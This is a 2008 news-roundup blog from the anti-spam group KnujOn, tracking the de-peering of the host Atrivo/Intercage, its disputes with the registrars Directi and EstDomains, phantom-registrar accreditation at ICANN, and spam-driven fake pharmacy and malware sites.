IP transit provider UnitedLayer agreed to provide upstream service to Intercage about 36 hours after its last transit provider pulled the plug. UnitedLayer's move, which is sure to prove unpopular in some circles, came after Intercage agreed to completely sever ties with Esthost, the Eastern European web host believed by many to be responsible for the lion's share of abusive traffic carried by Intercage.
(theregister.co.uk)
Controversial ISP Intercage Now Back Online
Pressure from computer security researchers may have knocked ISP (Internet service provider) Intercage offline, but not for long.
The San Francisco company, accused of being a haven to online criminals, is now back, just days after its last upstream network provider, Pacific Internet Exchange, dropped it as a customer.
Pacific had been Intercage's point of contact with the Internet's backbone, but it had dropped Intercage's service late Saturday night, knocking the controversial Internet service provider offline. (pcworld.com)
KnujOn Public Appearances
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 23, 2008
Recent public disclosures and positive activity within the Internet security community have provided encouraging news for long-suffering spam and malware victims. The demise of Atrivo/Intercage and recent revelations about EstDomains boost our belief that aggressive policy enforcement, efficient data collection, and industry cooperation can make a huge difference in creating a new, safer Internet. However, there is still quite a bit of work to be done.
KnujOn is calling on all the Domain Name Registrars and other concerned parties to help develop policy and methods to specifically put a stop to the fake pharmacy menace.
The Directi Group has lead the way by making a commitment to end the easy flow of counterfeit and hijacked pharmaceuticals on the Internet.
KnujOn invites all companies in the ICANN-Accredited community to make the same public pledge.
To this end KnujOn will be presenting a plan and series of proposals at several events in the near future. Our Three-Point plan (Fixing the Broken Policy Structure, Eradicating Illicit Internet Traffic, and Enfranchising the Consumer) will be discussed at the Messaging Anti-Abuse Working Group (MAAWG) General Meeting September 23rd, the Open Web Application Security Project (OWASP) Conference September 24th, the Anti-Phishing Working Group (APWG) eCrime Researchers Summit October 15th, and the Information Security Summit October 31st. Details about each event are listed on KnujOn.com.
One of our proposals to the security community could be a "game-changer" in terms of dealing with malware and other security threats. KnujOn looks forward to the community's support in this endeavor.
September 22, 2008
California-based network provider Intercage has gone completely offline following weeks of scathing criticism that it hosts an inordinate number of sites engaged in phishing, malware propagation, and other illegal activities.
Pacific Internet Exchange, which only began providing upstream service to Intercage in the last week or so, pulled the plug on Saturday night.
It's a safe bet that PIE's move was in response to recent efforts to isolate Intercage following a report that it enables a rogue's gallery of customers to punt spam, malware, and online (illegal) pharmaceuticals. The report so tarnished Intercage's already struggling reputation that both of its longterm providers canceled service.
According to an email sent last week by Intercage president and owner Emil Kacperski, PIE was immediately punished for its actions. Within a few days, a block of IP addresses issued to PIE was included on the Spamhaus block list, according to Brian at PIE. Spamhaus officials were not immediately available to comment.
An outgoing message on Kacperski's voice mail apologized for the outage and said company officials were "trying to get this resolved as soon as possible."
Volunteers active in ridding the internet of abusive sites celebrated the take down of Intercage, which has also gone under the name Atrivo.
(theregister.co.uk)
Internet Shuns U.S. Based ISP Amid Fraud, Abuse Allegations
Atrivo, a.k.a "Intercage," of Northern California, ceased to be reachable from any points on the Internet early Sunday morning when the ISP's sole remaining provider - Pacific Internet Exchange (PIE) - stopped routing traffic for the troubled company.
The final blow comes just weeks after Security Fix joined several researchers in publishing evidence that major portions of Atrivo's network were being used to foist fake security software, Trojan horse programs, and other nastiness. As a result of those reports, several of Atrivo's upstream providers dropped the company as a client.
(voices.washingtonpost.com)
Russian Business Network (RBN) Atrivo Goes Dark
It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.
(voices.washingtonpost.com)
KnujOn Public Appearances
September 23rd Messaging Anti-Abuse Working Group "MAAWG" (maawg.org)
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 21, 2008
The FBI has served a search warrant against a 20-year-old college student in connection with the hacking of Sarah Palin’s personal e-mail account.
A witness told WBIR-TV that FBI agents served the warrant at the college residence of David Kernell, a student at the University of Tennessee-Knoxville. Kernell is the son of Mike Kernell, a Democratic state representative from Memphis.
...
The hacker who compromised Palin’s account used Ctunnel.com, an Internet proxy site, which renders Web users anonymous, to get into Palin’s e-mail. The site is run by Gabriel Ramuglia, 25, a Web developer from Athens, Ga., who said the hacker left behind revealing clues after posting screen grabs of Palin’s inbox.
(elections.foxnews.com)
Palin's Email Hacked By Anonymous (dailytech.com)
September 20, 2008
KnujOn will be presenting at several venues between now and November. These critical meetings will allow us to discuss our plans in the near future:
September 22-24 Messaging Anti-Abuse Working Group "MAAWG" (maawg.org)
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 18, 2008
The Internet Corporation for Assigned Names and Numbers (ICANN) has not adequately explained to the world the need for more generic top-level domains (gTLDs - such as .com), industry representatives said last week.
As the time nears for ICANN, the internet’s technical oversight body, to publish draft guidelines (request for proposals) in the fourth quarter of 2008 for the gTLD applications, the chorus of criticism against the new domains is getting louder, with some saying it is merely a way for the global domain-name body to make money.
(ip-watch.org)
September 17, 2008
Washington Post Coverage on Nefarious Domain Name Activities
Over the last few months Brian Krebs of the Washington Post has been covering stories about domain name resellers and registrars who are in one way or another tied in to nefarious online activities such as spamming, spyware and malware. A noticeable trend in these articles is that the activity of these scammers is consistently showing them to be using registrar reseller accounts and privacy protection to cover their tracks. Krebs’ stories are worth reading as they highlight the issues in the domain name system, ICANN and registrars which continue to provide a means for these scammers to operate.
(domainnamenews.com)
Registrar Bends to Pressure from Researchers
The lesson of this story? If you believe in the quality of your work, don't let anyone try to move you off your spot.
Over a week after anti-spam research house KnujOn first called out India-based registrar Directi for allowing its business partners to support illegal online pharmacies, the registrar has sought a truce with the experts after cutting ties with the questionable domain owners.
As you may have followed via a pair of posts in this space last week and the subsequent comments filed by the involved parties, KnujOn and Directi, along with some other researchers who got into the debate, had partaken in some heated exchanges, with the registrar questioning the KnujOn report, which it initially labeled as "baseless," and KnujOn refusing to submit to the company's demands to retract its claims.
For, after questioning everything from the quality of the KnujOn conclusions to the journalistic integrity of those (ahem) who chose to cover the paper on "phantom registrars" that fail to vet their customers properly, Directi has moved to quell the issue and suspend the accounts of the illegal pharmacies that apparently have indeed been using its services.
(securitywatch.eweek.com)
Ad hoc malware police besiege net neutrality
Analysis Over the past couple of weeks, white hat netizens have scored two important victories in their tireless quest to clean up some of the internet's darkest recesses. While the events are encouraging, forgive us if we don't jump for joy.
(theregister.co.uk)
September 16, 2008
"The unscrupulous distribution of addictive and dangerous prescription drugs continues to be a major problem on the internet in our country," according to Larry Golbom, host of The Prescription Addiction Radio Show. This week the topic will be to challenge the head of the Judiciary Committee, John Conyers, and our congressional leaders, in helping us stop the growing narcotic prescription internet sites. Listen to The Prescription Addiction Radio Show on WGUL 860 AM (www.860wgul.com) on Sunday night, September 21 - 9:05 p.m. Eastern.
(prescriptionaddictionradio.com)
September 15, 2008
Rather than directly assaulting banks or credit cards, phishers are now targeting online services that use credit cards:
September 14, 2008
In a rambling press release EstDomains' Konstantin Poltev professes the Registrar's innocence and tries to rally everyone in the fight against cybercrime. How original. However, the entire premise of this release is flawed since they are still claiming to be located in the United States when everyone knows they are not.
"Wilmington, DE (PRWEB) September 14, 2008 -- EstDomains, Inc, a US-based domain name Registrar, officially declares opposition to malware mongers..." (prweb.com)
If they want us to believe them, they should start by completely coming out of the shadows and telling everyone where they really are. Until we know the first level of truth, every other claim is suspect.
September 13, 2008
This year, the posts and white papers circulating on the web portray new protagonists like AbdAllah, Atrivo, Directi or EstDomains. Like their RBN senior branch, these Internet network providers are strongly suspected to protect many actors in the malware/phishing/fraud world.
In February 2008, a ShadowServer foundation document explained that many domains had moved from RBN to AIH (AbdAllah Internet Hizmetleri). Like me, many researchers saw here a revival of RBN. But as it is assumed by some French bloggers, it was only a migration from customers, from one bulletproof hoster to another.
(avertlabs.com)
September 12, 2008
The Virginia Supreme Court today struck down a state anti-spam law, saying the statute violated the First Amendment right to free and anonymous speech. The decision also tossed out the conviction of a North Carolina man once described as one of the most prolific spammers.
(washingtonpost.com)
September 11, 2008
A cyber gang known for aggressively spreading fake anti-spyware programs through hijacked and malicious Web sites has become an authorized reseller of domain names. Security Fix has learned that this gang is using its access as a registrar to ease the process of creating new Web sites used to push their invasive software.
(washingtonpost.com)
September 10, 2008
The global fight against spammy websites saw a bizarre episode unfold over the past week, involving two Internet hosting companies, an anti-spam and anti-phishing organization, and the ghost of ICANN hovering in the background. For those who missed it, KnujOn, a company whose product fights junk email, including spam and phishing, published a report alleging certain domain resellers and hosting providers were complicit with organizations using spam email to lure unsuspecting users into using illegal online pharmacies.
When it comes to situations like this one, where the governing body -- ICANN -- seems either unable or unwilling to deal with the situation, it's often the court of public opinion that reveals the extent of the problem and forces some participants to change their ways. The KnujOn-Directi-HostExploit situation only reinforces the need for more oversight of domain registration and hosting, stiff penalties that are actually enforced, and a less complicated hierarchy of accredited registrars and resellers.
(thestandard.com)
September 9, 2008
We have been asking questions about EstDomains for some time, and now we are finally getting some answers thanks to Brian Krebs and a number of security researchers.
The "Est" in EstDomains is a nod to the company's origins: It was founded in Tartu, the second largest city in Estonia (although the corporation is officially registered in Delaware). The chief executive of EstDomains is 27-year-old Vladimir Tsastsin.
It seems Mr. Tsastsin has a rather colorful past, and is no stranger to organized crime. According to the local court and news media, he was recently sentenced to three years in an Estonian prison after being found guilty of credit card fraud, document forgery, and money laundering.
(washingtonpost.com)
The accreditation of EstDomains should and must be terminated under ICANN's Registrar Accreditation Agreement:
"
5.3 Termination of Agreement by ICANN. This Agreement may be terminated before its expiration by ICANN in any of the following circumstances:
5.3.2 Registrar:
5.3.2.1 is convicted by a court of competent jurisdiction of a felony or other serious offense related to financial activities, or is judged by a court of competent jurisdiction to have committed fraud or breach of fiduciary duty, or is the subject of a judicial determination that ICANN reasonably deems as the substantive equivalent of those offenses; or
5.3.2.2 is disciplined by the government of its domicile for conduct involving dishonesty or misuse of funds of others.
5.3.3 Any officer or director of Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is judged by a court to have committed fraud or breach of fiduciary duty, or is the subject of a judicial determination that ICANN deems as the substantive equivalent of any of these; provided, such officer or director is not removed in such circumstances.
" (icann.org)
It's time for ICANN to remove the criminal registrars.
September 8, 2008
Update, Monday, Sept 8, 12:00 p.m. ET: Todd Braning, vice president of BandCon, just e-mailed me to say that BandCon also has stopped providing connectivity to Atrivo/Intercage. From his e-mail: "Intercage, a new customer, was connected to the BandCon Network for a total of about a week. Once we recognized an issue with Intercage, BandCon took immediate action and terminated services. We are no longer providing services to AS27595. This can be confirmed here."
WVFiber is the only company still providing direct connectivity to Atrivo, and as stated before they plan to pull the plug by Thursday at the latest, so it appears that Atrivo will have to find another network provider or it will very soon cease to be reachable on the Internet.
All good news. Atrivo/Intercage have been a huge malware problem for a long time. This takes a good chunk of bad out of the Internet. Not a major chunk, there are many other hosts like Atrivo, but this is a step in the right direction. I'm VERY reassured to see some positive action by the responsible bandwidth providers and by nLayer who've discontinued business with a known bad entity, and in nLayer's case taken back their IP space.
We CAN make a difference, and it doesn't have to be via law enforcement action, which as we all know can be difficult to initiate in the light of how this kind of crime works across global jurisdiction.
(emergingthreats.net)
September 7, 2008
In light of recent developments, Jart Armin of HostExploit.com, Bhavin Turakhia, CEO of Directi, and Garth Bruen of Knujon have had an open dialogue and mutually agreed to release this joint statement clearing up any previous misconceptions and reaffirming their common goal to combat abuse on the Internet. Here are a few of the points they would like to jointly make:
* Directi, HostExploit and Knujon recognize and confirm that they share the common goal of continuing to combat spam and abuse on the Internet through cooperation, collaboration and proactive action. In conversation yesterday, Directi, HostExploit and Knujon agreed to publish this statement to clarify any misconceptions and affirm their mutual commitment to work closely to combat abuse.
* Directi clarified to HostExploit that, LogicBoxes (a Directi business) is not hosting any of Atrivo's websites. Atrivo runs its web infrastructure under the name of Hostfresh.com which is not affiliated with Directi in any manner.
* Directi also confirmed that ESTDomains is not a Directi company, and Directi does not control the actions or clients of ESTDomains, a fact that HostExploit was already aware of.
* HostExploit confirms that its report was not meant to allege that LogicBoxes is directly sponsoring Internet abuse, rather its report was meant, in good faith, only to provide relevant parties with all information and data which can be used to clean up websites that were violating principles of ethical behavior. HostExploit hopes that other Internet news sites which may have taken the data in the HostExploit report out of context in assuming that LogicBoxes is directly affiliated with Atrivo rectify this misconception. Directi confirms that LogicBoxes is simply a software provider to various ICANN Accredited Registrars, and its only role was providing software for domain registration and DNS management.
* HostExploit and Knujon did share with Directi a separate list of additional web sites known for badware that belong to Atrivo, enabling Directi's abuse team to swiftly suspend them. Directi, HostExploit and Knujon intend to continue this information exchange to speedily resolve abuse issues, and to further demonstrate transparency the community can contact either Directi and/or HostExploit to ensure action is taken.
* Directi has clarified that privacyprotect.org is merely a privacy protection service used by many of Directi's legitimate clients, not unlike the privacy protection services offered by other Registrars. Directi further confirmed that privacy protection had already been disabled on a large percentage of Atrivo's domain names over a month ago. Since Directi offers privacy protection free of cost, there are miscreants who use it to cloak their malicious activities. However Directi reaffirmed that its abuse team will suspend privacy protection on any domain for which they receive a genuine complaint in less than 24 hours. In fact a few months ago, based on reports and data obtained from the antispam community, Directi ceased to offer its privacy protection services to all customers of ESTDomains and to tens of thousands of other domains obtained through the community. Currently over half a million genuine customers of Directi use privacy protection services to prevent their whois data from being harvested.
* Directi affirms they are in no way supporting illicit online pharmacies. KnujOn has sent a list of newly populated fake pharmacy domains that Directi suspended. Directi and KnujOn now jointly call on the Internet community, private industry, and government to help develop policy and methods to put a stop to the fake pharmacy menace since Registrars cannot do this alone.
* Knujon acknowledges that the 48 Registrars that it thought were phantom are actually in existence as Delaware-incorporated legitimate companies with a valid ICANN Accreditation and accurate contact information. Knujon's confusion stemmed from the fact that ICANN does not require these companies to publicly report their incorporation details.
* Directi and HostExploit have discussed further ways to enhance their cooperative collaboration to clamp down on spam and other forms of abuse on the Internet as rapidly as possible. Directi acknowledges and applauds HostExploit's continuous efforts in tracking down miscreants. HostExploit confirms that they are pleased to work directly with the Directi abuse desk in helping Directi identify any miscreants that may be using Directi's services. The partnership includes sharing investigative processes and intelligence data on an ongoing basis.
Together with the community we hope to continue taking steps to make the Internet a better and safer place.
September 6, 2008
As early as November 2007, Armin and I (McQuaid) had corresponded regarding the presence of former customers of the Russian Business Network ISP operating in Atrivo IP space. Over the next several months, as a part of our normal malware investigations, we noted the disproportionate amount of malware within Atrivo. During this time, I was publishing a list of RBN IPs at Matt Jonkman's emergingthreats.net, and also a blackhole DNS file for Smoothwall. To that end, in March 2008 I completed a survey of all class C networks within Atrivo and incorporated those domains into the Smoothwall blackhole DNS file. I also added all of Atrivo's IP space to the blacklist of RBN IP addresses.
(securehomenetwork.blogspot.com)
September 5, 2008
A different angle on SPAM and malware
Two websites have recently published reports on Internet security and the spread of malware across the web, and both documents examine the problem from a new perspective. Most online security coverage tends to focus on the perpetual war between the antimalware industry and the companies that earn an illicit living from selling botnets and developing new exploits. The reports from HostExploit and Knujon, however, focus on the registrars and ISPs that actually provide hosting to the black hats, and explore the various connections between the organizations.
(arstechnica.com)
Spammers Find a Friend (dailytech.com)
Where is the promised Comprehensive Review of ICANN Accreditation Processes? (icann.org)
More fallout on the suspended malware sites (msmvps.com)
Spam at the Highest Levels (silobreaker.com)
Scammer-Heavy U.S. ISP Grows More Isolated
Last week, Security Fix published an analysis of Atrivo, a California based Internet service provider, also known as Intercage, that has proven to be a virtual magnet for cyber-criminal operations. Since that time, Atrivo's biggest network backbone provider decided it could no longer support the company, and stopped offering it direct connectivity. (washingtonpost.com)
September 4, 2008
Directi has vigorously responded to KnujOn's report, rejecting many of the claims in it. Directi has provided us with some commentary and we will discuss it in the context of our report.
EstDomains
Directi is now severing ties with EstDomains amid complaints that the Eastern European company makes it too easy to register sites that are used by spammers and scammers.
"Just the reputation loss and the confusion because of these linkups has been more detrimental to us than the commercial gain from that one-off sale," said Directi CEO Bhavin Turakhia. "We felt it was the right move morally."
The link with EstDomains was one of our biggest concerns, and we have to applaud Directi for taking this step.
EstDomains has not responded to requests to disclose their real location in Eastern Europe.
Turakhia says he looks forward to the day when he can completely sever ties with Estdomains.
"I would really love to detach ourselves from that organization," he said. Awesome.
Phantom Registrars
In investigating the 48 Directi-owned Registrars with questionable locations, we reported facts. The address used by many of these Registrars, "14525 SW Millikan Way Beaverton, OR 97005-2343", is the address of a mail forwarding service called Earthclassmail. According to Directi, the listed companies are registered in Delaware, but not in Oregon or New York as listed in the ICANN Directory. Directi is headquartered in Mumbai, India. KnujOn feels that any company given so much responsibility over the Internet should fully disclose where they are located, but this is apparently not an ICANN requirement.
Indeed, Stacy Burnette, director of contractual compliance at ICANN, said the organization is satisfied the registrars are incorporated in the location listed in their application. Telephone numbers in the contact information need not correspond to the location of incorporation, she said. ICANN doesn't require registrars to publicly disclose their place of incorporation.
To which KnujOn says: Huh? So, as the expression goes, don't hate the player, hate the game. Directi merely acquired these accreditations by ICANN's own rules. Summary: One address in the application, a second address disclosed to the public.
Read this line again: "ICANN doesn't require registrars to publicly disclose their place of incorporation." How does this figure into ICANN's mission to be an open and transparent organization? "Telephone numbers in the contact information need not correspond to the location of incorporation." How can there be any accountability? This situation is upside-down. Registrants are required to list their valid contact information, but the Registrars who sponsor their domains are not.
PrivacyProtect.org
Directi has informed us they no longer use PrivacyProtect. This is encouraging news, and we applaud them.
Un-suspended Domains
Directi says that a technical error caused some fake pharmacies to reappear. We'll have to take their word on it.
Illicit Sites
Most importantly, Directi has accepted KnujOn's challenge to dump illicit sites and become an example in the industry. We have offered them our assistance in this endeavor.
September 3, 2008
Two recently issued reports portray the Internet Corporation for Assigned Names and Numbers (ICANN) as a bureaucracy that enables cyber criminals.
In one report (PDF), researchers Jart Armin, James McQuaid and Matt Jonkman detail how one of ICANN's prized sponsors has ties to one of the net's more prolific sources of malware and illegal online pharmacies. It's called LogicBoxes, and over the past two years, ICANN has listed it as a sponsor for meetings that took place in Los Angeles and Delhi, India.
(theregister.co.uk)
"Phantom Registrar" Problem Predicted in 2007
"
There are times when loopholes seem to be the only source of true
innovation in the DNS – it was a loophole in the RAA that allowed for the
marketing of proxy registration services; it was loopholes in the
accreditation process that allowed for the creation of “phantom
registrars” that only exist as a device to gain access to the deleted
names pool...Loopholes can become the bane of our community… and they are not
easy to spot."
(losangeles2007.icann.org)
...oops, predicted in 2006
"Most of the affected domains seem to be registered by cyberwarehousing operation Ovidio Limited. Ovidio Limited has been registering thousands of generic keywords as .eu domains since the landrush in April. It also has a Cyprus address in the WHOIS data for all .eu domains checked. Even Ovidio's own .eu domain (ovidio.eu) is on hold. Perhaps EURid has been shamed into doing something about the bogus registrar problem?
...
The magnitude of EURid’s decision to sue 400 phantom registrars for breach of contract is only just becoming apparent... other phantom registrars still exist and action has not been taken against them yet."
(webmasterworld.com)
...oops, predicted in 2004
"You might not recognize the name Jennifer Ross-Carriere, but Jennifer is listed as the contact for (98) ninety-eight newly accredited ICANN registrars. http://www.icann.org/registrars/accreditation-qualified-list.html
Each one of these "accredited registrars" seems to have a website that forwards to namescout.com (although truthfully I didn't inspect all 98) All this just for the purpose of commandeering the batch pool?
Just my view, but I think this fully qualifies as gaming the system."
(does-not-exist.org)
September 2, 2008
The issues of Phantom Registrars and Registrar Criminality have become a source of outrage at ICANN's At-Large Committee.
"We cannot allow ICANN to get off the hook so easily. We cannot put through yet another tame comment while consumer protections are falling by the wayside with increased regularity.
...
Who anywhere would stand for accreditations being provided to non-existent companies and shell corporations?
...
ICANN has long been captured by the registries and registrars that exclusively feed its coffers. Whatever they want, they get and the public usually gets screwed.
...
The spam mitigation firm Knujon pointed to the nefarious activities of a single registrar associated with illicit pharmaceuticals that has sponsored 48 phantom accreditations. Extending accreditations to these shell/paper companies that are formed for the express purpose of gaming the system must stop. These phantom registrars are currently being used to game the aftermarket...This is simply not acceptable.
...
As a community, we are aware of accredited registrars in North America with officers that have been convicted of mail fraud, that continue to be associated with the deceptive marketing practices employed by the notorious Domain Registry of America. We are not happy about this.
...
We are aware of registrars that now stand as defendants in courts of law accused of cybersquatting, and yet ICANN lacks the will to suspend their accreditations." (atlarge.icann.org)
A request has been made of ICANN's Tim Cole to explain this situation.
September 1, 2008
In KnujOn's report Phantom Registrars, Fake Pharmacies, and the Secret Infrastructure we detail issues with EstDomains.
The Washington Post has covered more issues on EstDomains in connection to Atrivo. EstDomains now claims to be trying to clean up their act, but there are three issues that need to be addressed before we can take them seriously. We have made these challenges here and within the comments section of the Washington Post story:
- EstDomains needs to drop usage of PrivacyProtect.org. They claim they already have, but we will monitor to make sure.
- Disclose EstDomains' real location. According to EstDomains and Internic, they are located in Delaware. We know this is not true. We know they are located outside of the United States and want them to do the right thing and disclose their real location to the public.
- Address the steroid site complaint from July. Two months ago LegitScript and KnujOn sent a letter to EstDomains requesting they terminate an unlicensed steroid site being sponsored at EstDomains. EstDomains never responded and the site is still active. EstDomains now claims they never got the letter (which could have something to do with the issue above), even though we also sent it to all of their contact emails.
EstDomains Sponsored fitnesspharmaas.com
August 31, 2008
KnujOn will be discussed tonight, along with other topics, on Larry Golbom's radio program Prescription Addiction Radio at 9PM EST. Those in the Florida area can listen on 860 AM WGUL. Listeners elsewhere may stream over the Internet here, here, or here.
The Prescription Addiction Radio Show is dedicated to the thousands of families who are being or have been affected by the misuse of prescription drugs. The Prescription Addiction Radio Show is here to explore some of the challenges we face in trying to turn the explosion in the misuse of prescription drugs around.
(http://860wgul.townhall.com)
August 30, 2008
Brian Krebs's posting, Report Slams U.S. Host as Major Source of Badware, covers HostExploit's report on Atrivo and their apparent connection to a rogues' gallery of cybercrooks. The article has generated considerable backlash from Atrivo, Hostfresh, Intercage, and EstDomains, who have posted many, many comments to the Washington Post article slamming the report. However, the results have been verified by other groups like Spamhaus:
Without exception, all of the major security organizations on the Internet agree that the 'Home' of cybercrime in the western world is a place known as Atrivo/Intercage. We ourselves have not come to this conclusion lightly but from many years of dealing with criminal operations hosted by Atrivo/Intercage, gangs of cybercriminals - mostly Russian and East European but with several US online crime gangs as well - whose activities always lead back to servers run by Atrivo/Intercage. We have lost count of the times we have tracked a major virus botnet's "command and control" to Atrivo/Intercage servers, readers can view here some of the current and historic SBL records for Atrivo for a taste of what has been happening in this network. At almost every Internet security conference, or law enforcement seminar on cyber-crime, a presentation will detail some attack, exploit, phish or financial crime that has some nexus at Atrivo/Intercage.
(spamhaus.org)
August 29, 2008
Knujon coordinated with HostExploit.com to develop a parallel report to the one exposing ATRIVO and their connection to the Directi Group. A summary of the report, ATRIVO – CYBER CRIME USA, is below:
In a new study entitled "Atrivo - Cyber Crime USA", the authors have extensively tracked and documented ongoing cyber criminal activity from within the Internet servers controlled by the California-based Atrivo, and other associated entities. Atrivo is one of the Internet's Autonomous Systems and controls a large number of IP addresses, which web sites must use to reach consumers.
Produced by cyber crime researcher Jart Armin, in association with Matt Jonkman and James McQuaid, the first-of-its-kind Open Source Security study set out to quantify and continuously track cyber crime using numerous methods of measurement. It focuses specifically on the notorious Atrivo, which has been seen by many over several years as a main conduit for financial scams, identity theft, spam and malware.
This study, although fully self-contained, is the first of a series of reports; on a monthly basis there will be a follow-up to report on the community response, the efforts of the cyber criminals to evade exposure, listings to assist in blocking the risks to Internet users, and hopefully efforts to stop them.
In addition to original quantitative research conducted by Armin, Jonkman and McQuaid, the study draws upon the findings of other research efforts, including StopBadware, EmergingThreats, Knujon, Sunbelt, CastleCops, Spamhaus, and many others. What emerges is a picture of a front for ruthless cyber criminals, who have specifically targeted consumers in the United States and elsewhere. The study provides hard data regarding specific current activity within Atrivo, explains how consumers are targeted, describes Atrivo's virtual network structure and organizational modeling, and cites Atrivo's collusive failure to respond to abuse complaints from 2004 to the present. The study includes three dimensional charts, diagrams, and a YouTube video which make it easy to grasp the statistics or processes discussed.
Get the report here: Atrivo - Cyber Crime USA
Additional details are available at stopbadware.org:
Jart Armin, StopBadware.org community volunteer and intrepid security researcher, released a report today that concludes that Intercage and Atrivo, a California-based family of companies that operate web hosting, domain registration, and other online services, are a hub of badware activity:
Atrivo is a major hub of cyber crime based within the USA, and has been known as such within the Internet community for many years. Within this study we provide detailed evidence not only for public and community awareness but also to provide evidence for action.
Atrivo's reach in the cyber crime community and the Internet as a whole runs deep. From their partners in crime, to the domain registration and hosting services, it has to be remembered this is deliberately misleading to avoid detection.
Some of the companies included in the report have built a reputation in the security community as being havens for this type of activity, and Jart’s extensive research raises questions about the degree to which these companies are aware of, and turn a blind eye to, badware activity on their systems.
...and from the Washington post:
Report Slams U.S. Host as Major Source of Badware:
Several noted security researchers are releasing a report today that stems from many months of investigating malicious activity emanating from Atrivo's customers. Security experts say that Atrivo, also known as "Intercage," has long been a major source of spyware, adware, viruses and fake anti-virus products.
The report is an exhaustive and well-researched analysis of Atrivo and its operations. Some of the statistics on active exploits cited in that report come from data sets I commissioned during my own investigation of Atrivo and later shared with Jart Armin, the principal author of the report and curator of the blog hostexploit.com.
Looking back several years, Atrivo's various networks were used heavily by the Russian Business Network, an ISP formerly based in St. Petersburg, Russia. RBN had gained notoriety for providing Web hosting services catering exclusively to cyber criminals. But after increased media attention, RBN dispersed its operations to other, less conspicuous corners of the Internet.
(voices.washingtonpost.com/securityfix/)
August 28, 2008
In examining what is driving and enabling Internet criminality KnujOn has taken a critical look at the Registrar community. Some have wondered why, noting that a Registrar simply holds domain names and points them at the name servers that resolve them to IP addresses. But that is the simple point. Registrars have been given an enormous public trust. KnujOn has noted serious flaws in the system that is supposed to monitor Registrar compliance and the failure of the industry to police itself. KnujOn has noted Registrars refusing to terminate illicit domains even after receiving detailed information about the illegal nature of these sites.
Even more telling, we have two recent cases of Registrars being directly involved in fraud, spamming and other questionable activities.
In 2002 Peter Kuryliw pleaded guilty to fraud in a Canadian court and was fined $30,000 for targeting over 40,000 businesses with fake invoices. Mr. Kuryliw was granted accreditation for an Internet Registration business by ICANN (namejuice.com) and may have part ownership in several other Internet companies. And it continues: in 2003 a court ordered a Kuryliw-affiliated Registrar to stop using deceptive emails. Namejuice.com is still operating.
Example two.
Scott Richter paid $7 million to Microsoft in 2006 in a settlement arising out of a lawsuit alleging illegal spam activities. He also settled another spam case with the New York Attorney General for $50,000 in 2004. In 2008 MySpace was awarded $4.8 million in damages and $1.2 million in attorney's fees in a judgment against Richter's company for sending spam to MySpace members through compromised MySpace accounts.
Scott Richter owns Registrar Dynamic Dolphin, which until recently was the largest user of the PrivacyProtect.org service.
Registrars will often refer spam victims to the "upstream ISP" or website operators to file abuse complaints. However, when the content is hosted on zombie botnets and the owners are anonymously hidden by PrivacyProtect.org, there is no one else to direct a complaint to but the Registrar. And it is the Registrar who has ultimate control over terminating a domain.
EstDomains
EstDomains is a Registrar that also makes heavy use of the PrivacyProtect.org service for masking the ownership of fake pharmacy domains. EstDomains is incorporated in Delaware. For those not familiar with U.S. geography, Delaware is a tiny state that earns its keep by being very business-friendly. Typically, any business incorporated in Delaware is not actually there. This means there are scant details publicly available for who owns EstDomains.
EstDomains Sponsored fastcanadianpharmacy.com

It is also important to note that this site claims it is "FDA Approved" and "Trusted by VeriSign." The depth of misrepresentation at these sites is profound and seems to exist with absolute impunity.
So, we have an ICANN Registrar with undisclosed ownership who sponsors unlicensed Internet pharmacy domains (advertised with spam from zombie botnets) with anonymous ownership through an anonymously owned privacy registration service. How is the consumer being protected?
Drugs, Pornography, and Malware
Using pornography to lure unsuspecting Internet users into unknowingly downloading malware is an old trick, but one that continues to work. However, KnujOn has found an array of EstDomains sponsored, PrivacyProtect.org shielded domains that combine drugs, porn and malware. Several former EstDomains steroid sites have metadata that appears to offer Schedule 3 substances like Morphine, Testosterone, and Vicodin but redirects the user's browser to youtube-free-videos.com (also sponsored by EstDomains), a porn site that attempts to download malware in the guise of a "player update." The scripting vigorously prevents the user from navigating away from the page or closing it. The content of youtube-free-videos.com is served from best-of-searcht.com (also sponsored by EstDomains), another porn site that has links to another fake pharmacy: world-pharmacy-online.com (also sponsored by EstDomains).
The EstDomains sponsored and PrivacyProtected domain asiangirlporn.net rotates the sites the user is redirected to. One site, movlabs.com, seems to feature films that depict rape scenes as well as attempting to download malware from aviupdate.com (also sponsored by EstDomains).
EstDomains Sponsored movlabs.com
Another redirect landing launched from asiangirlporn.net links to a fake virus/spyware scan site: security-scan-pc.com. This particular fake security software is actually one of the most insidious PC infections to date. It blocks access to the Control Panel, Registry Editor, hard drive, removable media, Task Manager, Run, and just about any utility someone might use to fix their PC or remove the malware. It also blocks installation and running of legitimate anti-virus packages. Once infected your PC can only be used as a botnet node or a doorstop.
security-scan-pc.com
It is unclear whether this is simply an attempt to expand the botnets or a trap for anyone trying to investigate these sites.
August 21, 2008
SHANGHAI - Jason Yao lives a dangerous life for a guy in the golf business.
He gets death threats. He raids factories and markets. He shakes down informants and hangs out with private investigators. He has 10 aliases.
China is the focus of the worldwide war against counterfeit golf products, and Yao is on the front lines. His employer, Acushnet, located 7,000 miles away in Fairhaven, Mass., makes the world's most popular - and most copied - golf ball, the Titleist Pro V1, along with clubs, accessories, and shoes that counterfeiters mimic for sales around the globe.
(boston.com)
August 20, 2008
WASHINGTON - (AP) A hacker broke into a Homeland Security Department telephone system over the weekend and racked up about $12,000 in calls to the Middle East and Asia.
The hacker made more than 400 calls on a Federal Emergency Management Agency voicemail system in Emmitsburg, Md., on Saturday and Sunday, according to FEMA spokesman Tom Olshanski.
FEMA is part of Homeland Security, which in 2003 put out a warning about this very vulnerability.
(news.yahoo.com)
August 19, 2008
Several major online threats—spam, spyware, and virus infections—have declined significantly over the past few years, our new State of the Net survey has found.
